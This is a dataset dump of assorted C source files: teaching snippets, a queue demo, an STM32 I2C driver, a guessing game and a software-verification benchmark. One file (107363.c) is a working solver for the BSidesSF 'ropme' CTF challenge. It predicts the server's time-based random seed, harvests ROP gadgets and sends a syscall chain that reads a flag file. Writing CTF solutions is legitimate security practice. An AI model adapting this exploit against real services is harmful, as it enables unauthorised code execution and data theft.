file
stringlengths 18
26
| data
stringlengths 3
1.04M
|
---|---|
the_stack_data/28194.c | /* Ordinary struct */
struct coordinates {
int x,y;
};
/* Struct with enum declaration inside */
struct rainbow {
enum Fruit{Violet, Indigo, Blue, Green, Yellow, Red};
enum Fruit field1;
};
/* Anonymous struct */
struct {
char alpha;
int num;
} var;
/* Nested Struct */
struct Student {
struct marks{
int physics;
}m1, m2;
struct Student *pointer;
struct Student **double_pointer;
};
/*Function pointer */
struct mycallback {
int (*f)(int);
};
/* Bit fields */
struct bits {
int x: 5;
int y: 1;
int z: 2;
};
/* Forward declaration */
struct context;
struct funcptrs{
struct context *ctx;
};
struct context{
struct funcptrs fps;
};
/* Struct containing named union */
struct st1 {
float b;
union u1 {
struct {
int a;
}svar1;
}uvar1;
};
/* Struct containing unnamed union */
struct st2 {
union {
int a;
}u;
int b;
}; |
the_stack_data/111077899.c | // arrchar.c -- pointer array, string array
#include <stdio.h>
#define SLEN 40
#define LIM 5
int main(void)
{
const char *mytalents[LIM] = {
"Adding numbers swiftly",
"Multiplying accurately", "Stashing data",
"Following instructions to the letter",
"Understanding the C language"
};
char yourtalents[LIM][SLEN] = {
"Walking in a straight line",
"Sleeping", "Watching television",
"Making letters", "Reading email"
};
int i;
puts("Let's compare talents.");
printf("%-36s %-25s\n", "My Talents", "Your Talents");
for (i = 0; i < LIM; i++)
printf("\nsizeof mytalents: %zd, sizeof yourtalents: %zd\n", sizeof(mytalents), sizeof(yourtalents));
return 0;
} |
the_stack_data/107363.c | #include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <time.h>
#define HOSTNAME "ropme-63513a97.challenges.bsidessf.net"
#define PORT 1338
// These constants should match the executable
#define CODE_LENGTH 0x500000
#define STACK_LENGTH 4096
#define CODE_START 0x13370000
// This lets you adjust for network delays - play with this if you're consistently
// off by a second on connecting and sending the payload
#define FUDGE 0
// Should be >= the length of the flag
#define RESERVED_AT_START 32
#define FLAG_PATH "/home/ctf/flag.txt"
int do_connect() {
struct hostent *hostname; /* server host name information */
struct sockaddr_in server; /* server address */
int s; /* client socket */
hostname = gethostbyname(HOSTNAME);
if(!hostname) {
fprintf(stderr, "Gethostbyname failed\n");
exit(1);
}
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr.s_addr = *((unsigned long *)hostname->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "Failed to create socket\n");
exit(1);
}
if(connect(s, (struct sockaddr *)&server, sizeof(server)) < 0) {
fprintf(stderr, "Failed to connect\n");
exit(1);
}
return s;
}
int get_timestamp(int s) {
int offset = 0;
char buf[1000];
memset(buf, 0, sizeof(buf));
// Make sure it ends.. this is very lazy
int i;
for(i = 0; i < 10; i++) {
offset += recv(s, buf + offset, sizeof(buf) - offset, 0);
printf("%s\n", buf);
if(offset > 0x20) {
return atoi(buf + 21);
}
}
printf("Connection failed!\n");
exit(1);
}
uint8_t *get_code(int timestamp) {
printf("Timestamp = %d\n", timestamp);
srand(timestamp);
int i;
uint32_t *random_code = (uint32_t *) malloc(CODE_LENGTH);
for(i = 0; i < CODE_LENGTH / 4; i++) {
random_code[i] = rand();
}
return (uint8_t*) random_code;
}
int find(uint8_t *buf, uint8_t *needle, size_t size) {
int i;
printf("Searching for: ");
for(i = 0; i < size; i++) {
printf("%02x ", needle[i]);
}
for(i = RESERVED_AT_START; i < CODE_LENGTH; i++) {
if(!memcmp(buf+i, needle, size)) {
printf(" - found @ 0x%08x\n", CODE_START + i);
return CODE_START + i;
}
}
printf(" - Couldn't find!\n");
return 0;
}
int find_ret_n(uint8_t *buf, int minimum, int maximum, int *result) {
int i;
printf("Searching for ret N");
for(i = RESERVED_AT_START; i < CODE_LENGTH; i++) {
if(buf[i] == 0xc2) {
//printf(" - Code %02x %02x %02x", buf[i], buf[i+1], buf[i+2]);
uint16_t test = *((uint16_t*)(buf+i+1));
//printf(" - Found ret %d", test);
if(test % 4 == 0 && test > minimum && test < maximum) {
printf("- Found ret %d @ 0x%08x\n", test, CODE_START + i);
*result = test;
return CODE_START + i;
}
}
}
printf(" - Couldn't find!\n");
return 0;
}
uint32_t *get_stack(int timestamp) {
// Generate the block
uint8_t *code = get_code(timestamp);
uint32_t *stack = malloc(STACK_LENGTH);
memset(stack, 0, STACK_LENGTH);
// Gather gadgets
int debug = find(code, (uint8_t*)"\xcc", 1);
int syscall = find(code, (uint8_t*)"\xcd\x80\xc3", 3);
int ret = find(code, (uint8_t*) "\xc3", 1);
int ret_length;
int ret_n = find_ret_n(code, strlen(FLAG_PATH), 0x400, &ret_length);
int pop_eax = find(code, (uint8_t*) "\x58\xc3", 2);
int pop_ecx = find(code, (uint8_t*) "\x59\xc3", 2);
int pop_edx = find(code, (uint8_t*) "\x5A\xc3", 2);
int pop_ebx = find(code, (uint8_t*) "\x5B\xc3", 2);
int inc_ebx = find(code, (uint8_t*) "\x43\xc3", 2);
int dec_ebx = find(code, (uint8_t*) "\x4b\xc3", 2);
//int mov_eax_esp = find(code, (uint8_t*) "\x89\xe0\xc3", 3);
int mov_ebx_esp = find(code, (uint8_t*) "\x89\xe3\xc3", 3);
int i = 0;
// If this is defined, just do an exit syscall (so I can test quickly)
#ifdef _SIMPLE_SOLVE
// Eax = 1 (exit)
stack[i++] = pop_eax;
stack[i++] = 1;
// Ebx = 0 (no error)
stack[i++] = pop_ebx;
stack[i++] = 1337;
// Syscall = write
stack[i++] = syscall;
#else
//////////////////////////// OPEN
// Eax = 0x05 (sys_open)
stack[i++] = pop_eax;
stack[i++] = 0x05;
// Ebx = esp (the stack)
stack[i++] = mov_ebx_esp;
// Skip over 32 bytes (where we'll store the flag path)
stack[i++] = ret_n;
// Do the first ebx increment (this happens before the big return)
stack[i++] = inc_ebx;
// We have <ret_length> bytes to mess around, now - fill them with garbage
memset(&stack[i], 'A', ret_length);
// Now fill them with the flag path
memcpy(&stack[i], FLAG_PATH, strlen(FLAG_PATH) + 1);
// Officially skip them
i += (ret_length / 4);
// These now happen after the return
// Increment ebx across all the other return address + variable (8 words)
stack[i++] = inc_ebx;
stack[i++] = inc_ebx;
stack[i++] = inc_ebx;
stack[i++] = inc_ebx;
stack[i++] = inc_ebx;
stack[i++] = inc_ebx;
stack[i++] = inc_ebx;
// Ecx = count (our reserved space)
stack[i++] = pop_ecx;
stack[i++] = RESERVED_AT_START;
// Syscall = this does the open()
stack[i++] = syscall;
////////////////////////////// READ
// Eax = 3 (read)
stack[i++] = pop_eax;
stack[i++] = 3;
// Ebx = 0 (the file handle) - make it zero then subtract one so we don't have a null
stack[i++] = pop_ebx;
stack[i++] = 1;
stack[i++] = dec_ebx;
// Ecx = the buffer - the unused space
stack[i++] = pop_ecx;
stack[i++] = CODE_START;
// Edx = the count
stack[i++] = pop_edx;
stack[i++] = RESERVED_AT_START;
// Syscall = read
stack[i++] = syscall;
//////////////////////////// WRITE
// Eax = 4 (write)
stack[i++] = pop_eax;
stack[i++] = 4;
// Ebx = stdout (1)
stack[i++] = pop_ebx;
stack[i++] = 1;
// Ecx = buf
stack[i++] = pop_ecx;
stack[i++] = CODE_START;
// Edx = count
stack[i++] = pop_edx;
stack[i++] = RESERVED_AT_START;
// Syscall = write
stack[i++] = syscall;
////////////////////////////// EXIT
// Eax = 1 (exit)
stack[i++] = pop_eax;
stack[i++] = 1;
// Ebx = 0 (no error)
stack[i++] = pop_ebx;
stack[i++] = 1;
stack[i++] = dec_ebx;
// Syscall = write
stack[i++] = syscall;
#endif
// Check if we missed anything
int misses = 0;
int j;
for(j = 0; j < i; j++) {
if(stack[j] == 0) {
misses++;
}
}
free(code);
if(misses > 0) {
printf("Missing code bits: %d\n\n", misses);
free(stack);
return 0;
}
printf("Got 'em all!\n");
return stack;
}
int go() {
// Connect the initial time
int s = do_connect();
// Get the timestamp
int their_timestamp = get_timestamp(s);
int my_timestamp = time(NULL);
int time_offset;
uint32_t *stack = 0;
for(time_offset = 0; ; time_offset++) {
stack = get_stack(their_timestamp + time_offset);
if(stack) {
break;
}
}
if(time_offset == 0) {
printf("Woohoo! The connection is good, let's send!\n");
send(s, stack, STACK_LENGTH, 0);
} else {
printf("We actually need to wait %d seconds...\n", time_offset);
close(s);
// Busy wait
for(;;) {
if(time(NULL) == my_timestamp + time_offset - FUDGE) {
s = do_connect();
int validate_time = get_timestamp(s);
if(validate_time != their_timestamp + time_offset) {
printf("Sad trombone! We needed %d, ended up at %d.. if this happens a lot, adjust FUDGE\n", validate_time, their_timestamp + time_offset);
exit(1);
}
printf("We got in right on time! Sending payload and crossing fingers...\n");
send(s, stack, STACK_LENGTH, 0);
break;
}
}
}
free(stack);
return s;
}
int main(int argc, char *argv[]) {
int s = go();
for(;;) {
char buf[1000];
memset(buf, 0, sizeof(buf));
if(recv(s, buf, sizeof(buf), 0) <= 0) {
printf("Done?\n");
exit(0);
}
printf("%s\n", buf);
}
close(s);
return 0;
}
|
the_stack_data/120425.c | //
// main.c
// 2-KthMove
//
// Created by FlyElephant on 2017/11/23.
// Copyright © 2017年 FlyElephant. All rights reserved.
//
#include <stdio.h>
void swap(int *a, int *b) {
int tmp = *a;
*a = *b;
*b = tmp;
}
void reverse(int *a, int b, int e) {
while (b < e) {
swap(&a[b], &a[e]);
b++;
e--;
}
}
void show(int *a, int len) {
for (int i = 0; i < len; i++) {
printf("%d\t",a[i]);
}
printf("\n");
}
int main(int argc, const char * argv[]) {
// insert code here...
int n = 7;
int k = 2 % n;
int a[7] = {1,2,3,4,5,6,7};
reverse(a, 0, n - 1);
reverse(a, 0, k - 1);
reverse(a, k, n - 1);
show(a, n);
return 0;
}
|
the_stack_data/184519019.c | // gcc -mpreferred-stack-boundary=2 -ggdb function.c -o function
/*
(gdb) disas function
;; function prelude
; push the stack base pointer so we can restore it after this function returns
0x080483fb <+0>: push %ebp
; save the stack pointer to the base pointer, so the base pointer
; points to the start of this function's stack frame
0x080483fc <+1>: mov %esp,%ebp
; grow the stack to allocate room for this function's locals
; (24 bits: 5 * 4 + 1, rounded up to 4 byte boundary)
0x080483fe <+3>: sub $0x1c,%esp
;; function body
0x08048401 <+6>: mov 0x8(%ebp),%edx
0x08048404 <+9>: mov 0xc(%ebp),%eax
0x08048407 <+12>: add %eax,%edx
; promote char to int
0x08048409 <+14>: movsbl -0x1(%ebp),%eax
0x0804840d <+18>: add %edx,%eax
;; function epilog
; restore esp and ebp to their state before this function call
0x08048401 <+6>: leave
; return to the next instruction after this function call
; (printf in main in this program)
0x08048402 <+7>: ret
*/
#include <stdio.h>
int function(int a, int b) {
int array[5];
char c;
return a + b + c;
}
int main(void) {
function(1, 2);
printf("`function` return address points here\n");
}
|
the_stack_data/82951562.c | #include <string.h>
// Definition for a binary tree node.
struct TreeNode
{
int val;
struct TreeNode *left;
struct TreeNode *right;
};
typedef struct vector
{
int distance[11];
} vector;
//return type {distance of node count}
vector postorder(struct TreeNode *root, int distance, int *count)
{
vector res;
memset(res.distance, 0, sizeof(res.distance));
if (!root)
return res;
if (!root->left && !root->right)
{
res.distance[1] = 1;
return res;
}
vector l = postorder(root->left, distance, count);
vector r = postorder(root->right, distance, count);
for (int i = 1; i <= distance; ++i)
{
for (int j = 1; j <= distance; ++j)
{
if (i + j <= distance)
*count += l.distance[i] * r.distance[j];
}
}
for (int i = 1; i < distance; ++i)
res.distance[i + 1] = l.distance[i] + r.distance[i];
return res;
}
int countPairs(struct TreeNode *root, int distance)
{
int count = 0;
postorder(root, distance, &count);
return count;
}
|
the_stack_data/153267014.c | extern void __VERIFIER_error() __attribute__ ((__noreturn__));
void __VERIFIER_assert(int cond) { if(!(cond)) { ERROR: __VERIFIER_error(); } }
#define SIZE 25
// implements a set and checks that the insert and remove function maintain the structure
int insert( int set [] , int size , int value ) {
set[ size ] = value;
return size + 1;
}
int elem_exists( int set [ ] , int size , int value ) {
int i;
for ( i = 0 ; i < size ; i++ ) {
if ( set[ i ] == value ) return 1;
}
return 0;
}
int main( ) {
int n = 0;
int set[ SIZE ];
// this is trivial
int x;
int y;
for ( x = 0 ; x < n ; x++ ) {
for ( y = x + 1 ; y < n ; y++ ) {
__VERIFIER_assert( set[ x ] != set[ y ] );
}
}
// we have an array of values to insert
int values[ SIZE ];
// insert them in the array -- note that nothing ensures that values is not containing duplicates!
int v;
for ( v = 0 ; v < SIZE ; v++ ) {
// check if the element exists, if not insert it.
if ( elem_exists( set , n , values[ v ] ) ) {
// parametes are passed by reference
n = insert( set , n , values[ v ] );
}
for ( x = 0 ; x < n ; x++ ) {
for ( y = x + 1 ; y < n ; y++ ) {
__VERIFIER_assert( set[ x ] != set[ y ] );
}
}
}
// this is not trivial!
for ( x = 0 ; x < n ; x++ ) {
for ( y = x + 1 ; y < n ; y++ ) {
__VERIFIER_assert( set[ x ] != set[ y ] );
}
}
return 0;
}
|
the_stack_data/184518391.c | #include <stdio.h>
#include <string.h>
int total_lines = 0;
int total_chars = 0;
int count_chars = 0;
int count_lines = 0;
const int count =200;
void process(char* pt) {
printf("inside process\n");
}
int charCount(char* buffer) {
return sizeof(buffer) ;
}
int lineCount() {
return 1;
}
int main(int argc, char** argv){
if(argc == 1){
printf("Please specify count line and chars\n");
} else if (argc ==2){
if (!strcmp(argv[1], "-c")){
count_chars = 1;
//printf("word count is enabled\n");
}else if (!strcmp(argv[1], "-l")){
count_lines = 1;
//printf("line count is enabled\n");
}
}
//printf("Integer Constant: %d\n", count);
while (1) {
char buffer[1024];
// FIXME: it will read only the first 1024 bytes from a line
char* res = fgets(buffer, sizeof(buffer), stdin);
if (!res && feof(stdin)) {
break;
}
if (count_chars) {
printf("You should see this message \n");
char *c = &buffer[0];
while (*c != '\n') {
total_chars++;
c++;
}
}
if (count_lines) {
printf("You should NOT see this message \n");
total_lines += lineCount();
}
if (feof(stdin)) {
// end of file
break;
}
}
if (count_chars)
printf("Count chars is:: %d\n", total_chars);
if (count_lines)
printf("Count Lines is:: %d\n", total_lines);
return 0;
}
|
the_stack_data/173579447.c | #include <stdio.h>
int main(void){
/*int bb = 10;
int *ptrBb = &bb;
printf("Adress \t\t Name \t Value\n");
printf("%p \t %s \t %d \n", &bb, "bb", bb);
printf("%p \t %s \t %p\n",&ptrBb, "ptrBb", ptrBb);
*ptrBb = 71;
printf("%p \t %s \t %d\n",&bb, "bb", bb);
int balleMos[5] = {1, 4, 6, 1, 8};
printf("Element \t Adress \t\t Value\n");
for (int i = 0; i < 5; i++){
printf("balleMos[%d] \t %p \t %d\n", i, &balleMos[i], balleMos[i]);
}*/
int tall[] =
{3, 4, 6, 1, 3};
int lengde = sizeof(tall)/sizeof(tall[0]);
int *ptrTall;
ptrTall = tall;
//printf("Adress \t\t Name \t Value\n");
printf("*ptrTall: %d, ptrTall: %p, tall: %d\n", *ptrTall, ptrTall, tall[0]);
printf("\nog dette da? %d\n", *(ptrTall+2));
}
|
the_stack_data/159516073.c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
int main() {
// imprime o cabecalho do nosso jogo
printf("******************************************\n");
printf("* Bem vindo ao nosso jogo de adivinhação *\n");
printf("******************************************\n");
int segundos = time(0);
srand(segundos);
int numerogrande = rand();
int numerosecreto = numerogrande % 100;
int chute;
int tentativas = 1;
double pontos = 1000;
int acertou = 0;
int nivel;
printf("Qual o nível de dificuldade?\n");
printf("(1) Fácil (2) Médio (3) Difícil\n\n");
printf("Escolha: ");
scanf("%d", &nivel);
int numerodetentativas;
switch(nivel) {
case 1:
numerodetentativas = 20;
break;
case 2:
numerodetentativas = 15;
break;
default:
numerodetentativas = 6;
break;
}
for(int i = 1; i <= numerodetentativas; i++) {
printf("Tentativa %d\n", tentativas);
printf("Qual é o seu chute? ");
scanf("%d", &chute);
printf("Seu chute foi %d\n", chute);
if(chute < 0) {
printf("Você não pode chutar números negativos!\n");
continue;
}
acertou = (chute == numerosecreto);
int maior = chute > numerosecreto;
if(acertou) {
break;
}
else if(maior) {
printf("Seu chute foi maior que o número secreto\n");
}
else {
printf("Seu chute foi menor que o número secreto\n");
}
tentativas++;
double pontosperdidos = (chute - numerosecreto) / (double)2;
if(pontosperdidos < 0) {
pontosperdidos = pontosperdidos * -1;
}
pontos = pontos - pontosperdidos;
}
printf("Fim de jogo!\n");
if(acertou) {
printf("Você ganhou\n");
printf("Você acertou em %d tentativas!\n", tentativas);
printf("Total de pontos: %.1f\n", pontos);
} else {
printf("Você perdeu! Tente de novo!\n");
}
}
|
the_stack_data/6815.c | /*
Summary: Queue is a data structure which works as FIFO principle. FIFO means “First in First out”, i.e the element which we have inserted first will be deleted first and the element that we have inserted last will be deleted last.Two variables are used to implement queue, i.e “rear” and “front”. Insertion will be done at rear side and deletion will be performed at front side.
*/
#include <stdio.h>
#define MAX 50
int queue_array[MAX];
int rear = - 1;
int front = - 1;
main()
{
int choice;
while (1)
{
printf("1.Insert element to queue \n");
printf("2.Delete element from queue \n");
printf("3.Display all elements of queue \n");
printf("4.Quit \n");
printf("Enter your choice : ");
scanf("%d", &choice);
switch (choice)
{
case 1:
insert();
break;
case 2:
delete();
break;
case 3:
display();
break;
case 4:
exit(1);
default:
printf("Wrong choice \n");
}
}
}
insert()
{
int add_item;
if (rear == MAX - 1)
printf("Queue Overflow \n");
else
{
if (front == - 1)
/*If queue is initially empty */
front = 0;
printf("Inset the element in queue : ");
scanf("%d", &add_item);
rear = rear + 1;
queue_array[rear] = add_item;
}
}
delete()
{
if (front == - 1 || front > rear)
{
printf("Queue Underflow \n");
return ;
}
else
{
printf("Element deleted from queue is : %d\n", queue_array[front]);
front = front + 1;
}
}
display()
{
int i;
if (front == - 1)
printf("Queue is empty \n");
else
{
printf("Queue is : \n");
for (i = front; i <= rear; i++)
printf("%d ", queue_array[i]);
printf("\n");
}
}
/*
Input: //Enter choices and data
*/ |
the_stack_data/97012395.c | /*
Specification:
if x = 0 then
return 0x00000000
else if x is power of 2 then
return 0xffffffff
else
-- unspecified
fi
Author : Wojciech Muła
Date : 2014-10-01
License : public domain
*/
#include <stdio.h>
#include <stdint.h>
#include <assert.h>
int is_power_of_two_non_zero(uint32_t x) {
return (x & -x) == x;
}
// ------------------------------------------------------------------------
uint32_t fill_word_naive(uint32_t x) {
assert(x == 0 || is_power_of_two_non_zero(x));
return x ? 0xffffffff : 0;
}
uint32_t fill_word_branchless(uint32_t x) {
assert(x == 0 || is_power_of_two_non_zero(x));
const uint32_t y = -x;
return ((int32_t)(y) >> 31);
}
// ------------------------------------------------------------------------
void verify() {
assert(fill_word_branchless(0) == fill_word_naive(0));
uint32_t bit = 1;
for (int i=0; i < 32; i++, bit <<= 1) {
assert(fill_word_branchless(bit) == fill_word_naive(bit));
}
}
int main() {
verify();
}
|
the_stack_data/140765152.c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
/* (c) Carlos J. Santisteban 2022 */
int main(void) {
int x,y,x1,y1,x2,y2,s1,s2,q1,q2,dir;
int dx[4]={1,0,-1,0};
int dy[4]={0,1,0,-1};
srand(time(NULL));
while(-1) {
x=rand()&31;
y=rand()&31;
dir=rand()&3;
x1=x+dx[dir];
y1=y+dy[dir];
dir=rand()&3;
x2=x+dx[dir];
y2=y+dy[dir];
if((x1!=x2)||(y1!=y2)){
s1=((x1*x1)>>2)+((y1*y1)>>2);
s2=((x2*x2)>>2)+((y2*y2)>>2);
q1=((x1*x1)>>3)+((y1*y1)>>3);
q2=((x2*x2)>>3)+((y2*y2)>>3);
printf("(%d,%d)-(%d,%d) = %d/%d - %d/%d\n",x1,y1,x2,y2,s1,s2,q1,q2);
if (q1==q2)
printf("[%c,%c]-[%c,%c]\n",32+(x1&1),32+(y1&1),32+(x2&1),32+(y2&1));
}
}
return 0;
}
|
the_stack_data/1006841.c | int a[1][1][1] = { 1 };
int b[1][1][1] = { { 1 } };
int c[1][1][1] = { { { 1 } } };
int d[1][1][1] = { { { { 1 } } } };
int e[1][1][1] = { { { { { 1 } } } } };
|
the_stack_data/11416.c | /**
******************************************************************************
* @file stm32f3xx_ll_i2c.c
* @author MCD Application Team
* @brief I2C LL module driver.
******************************************************************************
* @attention
*
* <h2><center>© COPYRIGHT(c) 2016 STMicroelectronics</center></h2>
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. Neither the name of STMicroelectronics nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
******************************************************************************
*/
#if defined(USE_FULL_LL_DRIVER)
/* Includes ------------------------------------------------------------------*/
#include "stm32f3xx_ll_i2c.h"
#include "stm32f3xx_ll_bus.h"
#ifdef USE_FULL_ASSERT
#include "stm32_assert.h"
#else
#define assert_param(expr) ((void)0U)
#endif
/** @addtogroup STM32F3xx_LL_Driver
* @{
*/
#if defined (I2C1) || defined (I2C2) || defined (I2C3)
/** @defgroup I2C_LL I2C
* @{
*/
/* Private types -------------------------------------------------------------*/
/* Private variables ---------------------------------------------------------*/
/* Private constants ---------------------------------------------------------*/
/* Private macros ------------------------------------------------------------*/
/** @addtogroup I2C_LL_Private_Macros
* @{
*/
#define IS_LL_I2C_PERIPHERAL_MODE(__VALUE__) (((__VALUE__) == LL_I2C_MODE_I2C) || \
((__VALUE__) == LL_I2C_MODE_SMBUS_HOST) || \
((__VALUE__) == LL_I2C_MODE_SMBUS_DEVICE) || \
((__VALUE__) == LL_I2C_MODE_SMBUS_DEVICE_ARP))
#define IS_LL_I2C_ANALOG_FILTER(__VALUE__) (((__VALUE__) == LL_I2C_ANALOGFILTER_ENABLE) || \
((__VALUE__) == LL_I2C_ANALOGFILTER_DISABLE))
#define IS_LL_I2C_DIGITAL_FILTER(__VALUE__) ((__VALUE__) <= 0x0000000FU)
#define IS_LL_I2C_OWN_ADDRESS1(__VALUE__) ((__VALUE__) <= 0x000003FFU)
#define IS_LL_I2C_TYPE_ACKNOWLEDGE(__VALUE__) (((__VALUE__) == LL_I2C_ACK) || \
((__VALUE__) == LL_I2C_NACK))
#define IS_LL_I2C_OWN_ADDRSIZE(__VALUE__) (((__VALUE__) == LL_I2C_OWNADDRESS1_7BIT) || \
((__VALUE__) == LL_I2C_OWNADDRESS1_10BIT))
/**
* @}
*/
/* Private function prototypes -----------------------------------------------*/
/* Exported functions --------------------------------------------------------*/
/** @addtogroup I2C_LL_Exported_Functions
* @{
*/
/** @addtogroup I2C_LL_EF_Init
* @{
*/
/**
* @brief De-initialize the I2C registers to their default reset values.
* @param I2Cx I2C Instance.
* @retval An ErrorStatus enumeration value:
* - SUCCESS: I2C registers are de-initialized
* - ERROR: I2C registers are not de-initialized
*/
uint32_t LL_I2C_DeInit(I2C_TypeDef *I2Cx)
{
ErrorStatus status = SUCCESS;
/* Check the I2C Instance I2Cx */
assert_param(IS_I2C_ALL_INSTANCE(I2Cx));
if (I2Cx == I2C1)
{
/* Force reset of I2C clock */
LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_I2C1);
/* Release reset of I2C clock */
LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_I2C1);
}
#if defined(I2C2)
else if (I2Cx == I2C2)
{
/* Force reset of I2C clock */
LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_I2C2);
/* Release reset of I2C clock */
LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_I2C2);
}
#endif
#if defined(I2C3)
else if (I2Cx == I2C3)
{
/* Force reset of I2C clock */
LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_I2C3);
/* Release reset of I2C clock */
LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_I2C3);
}
#endif
else
{
status = ERROR;
}
return status;
}
/**
* @brief Initialize the I2C registers according to the specified parameters in I2C_InitStruct.
* @param I2Cx I2C Instance.
* @param I2C_InitStruct pointer to a @ref LL_I2C_InitTypeDef structure.
* @retval An ErrorStatus enumeration value:
* - SUCCESS: I2C registers are initialized
* - ERROR: Not applicable
*/
uint32_t LL_I2C_Init(I2C_TypeDef *I2Cx, LL_I2C_InitTypeDef *I2C_InitStruct)
{
/* Check the I2C Instance I2Cx */
assert_param(IS_I2C_ALL_INSTANCE(I2Cx));
/* Check the I2C parameters from I2C_InitStruct */
assert_param(IS_LL_I2C_PERIPHERAL_MODE(I2C_InitStruct->PeripheralMode));
assert_param(IS_LL_I2C_ANALOG_FILTER(I2C_InitStruct->AnalogFilter));
assert_param(IS_LL_I2C_DIGITAL_FILTER(I2C_InitStruct->DigitalFilter));
assert_param(IS_LL_I2C_OWN_ADDRESS1(I2C_InitStruct->OwnAddress1));
assert_param(IS_LL_I2C_TYPE_ACKNOWLEDGE(I2C_InitStruct->TypeAcknowledge));
assert_param(IS_LL_I2C_OWN_ADDRSIZE(I2C_InitStruct->OwnAddrSize));
/* Disable the selected I2Cx Peripheral */
LL_I2C_Disable(I2Cx);
/*---------------------------- I2Cx CR1 Configuration ------------------------
* Configure the analog and digital noise filters with parameters :
* - AnalogFilter: I2C_CR1_ANFOFF bit
* - DigitalFilter: I2C_CR1_DNF[3:0] bits
*/
LL_I2C_ConfigFilters(I2Cx, I2C_InitStruct->AnalogFilter, I2C_InitStruct->DigitalFilter);
/*---------------------------- I2Cx TIMINGR Configuration --------------------
* Configure the SDA setup, hold time and the SCL high, low period with parameter :
* - Timing: I2C_TIMINGR_PRESC[3:0], I2C_TIMINGR_SCLDEL[3:0], I2C_TIMINGR_SDADEL[3:0],
* I2C_TIMINGR_SCLH[7:0] and I2C_TIMINGR_SCLL[7:0] bits
*/
LL_I2C_SetTiming(I2Cx, I2C_InitStruct->Timing);
/* Enable the selected I2Cx Peripheral */
LL_I2C_Enable(I2Cx);
/*---------------------------- I2Cx OAR1 Configuration -----------------------
* Disable, Configure and Enable I2Cx device own address 1 with parameters :
* - OwnAddress1: I2C_OAR1_OA1[9:0] bits
* - OwnAddrSize: I2C_OAR1_OA1MODE bit
*/
LL_I2C_DisableOwnAddress1(I2Cx);
LL_I2C_SetOwnAddress1(I2Cx, I2C_InitStruct->OwnAddress1, I2C_InitStruct->OwnAddrSize);
/* OwnAdress1 == 0 is reserved for General Call address */
if (I2C_InitStruct->OwnAddress1 != 0U)
{
LL_I2C_EnableOwnAddress1(I2Cx);
}
/*---------------------------- I2Cx MODE Configuration -----------------------
* Configure I2Cx peripheral mode with parameter :
* - PeripheralMode: I2C_CR1_SMBDEN and I2C_CR1_SMBHEN bits
*/
LL_I2C_SetMode(I2Cx, I2C_InitStruct->PeripheralMode);
/*---------------------------- I2Cx CR2 Configuration ------------------------
* Configure the ACKnowledge or Non ACKnowledge condition
* after the address receive match code or next received byte with parameter :
* - TypeAcknowledge: I2C_CR2_NACK bit
*/
LL_I2C_AcknowledgeNextData(I2Cx, I2C_InitStruct->TypeAcknowledge);
return SUCCESS;
}
/**
* @brief Set each @ref LL_I2C_InitTypeDef field to default value.
* @param I2C_InitStruct Pointer to a @ref LL_I2C_InitTypeDef structure.
* @retval None
*/
void LL_I2C_StructInit(LL_I2C_InitTypeDef *I2C_InitStruct)
{
/* Set I2C_InitStruct fields to default values */
I2C_InitStruct->PeripheralMode = LL_I2C_MODE_I2C;
I2C_InitStruct->Timing = 0U;
I2C_InitStruct->AnalogFilter = LL_I2C_ANALOGFILTER_ENABLE;
I2C_InitStruct->DigitalFilter = 0U;
I2C_InitStruct->OwnAddress1 = 0U;
I2C_InitStruct->TypeAcknowledge = LL_I2C_NACK;
I2C_InitStruct->OwnAddrSize = LL_I2C_OWNADDRESS1_7BIT;
}
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
#endif /* I2C1 || I2C2 || I2C3 */
/**
* @}
*/
#endif /* USE_FULL_LL_DRIVER */
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
|
the_stack_data/36350.c | /*
* elf_load.c
*
* Implementation of a simple linux loader.
*
* Note that this is only part of the implementation,
* I've managed to keep most of the bit twiddling in
* go itself -- this is simply easier because of the
* direct access to the ELF type definitions.
*
* Copyright 2014 Google Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <elf.h>
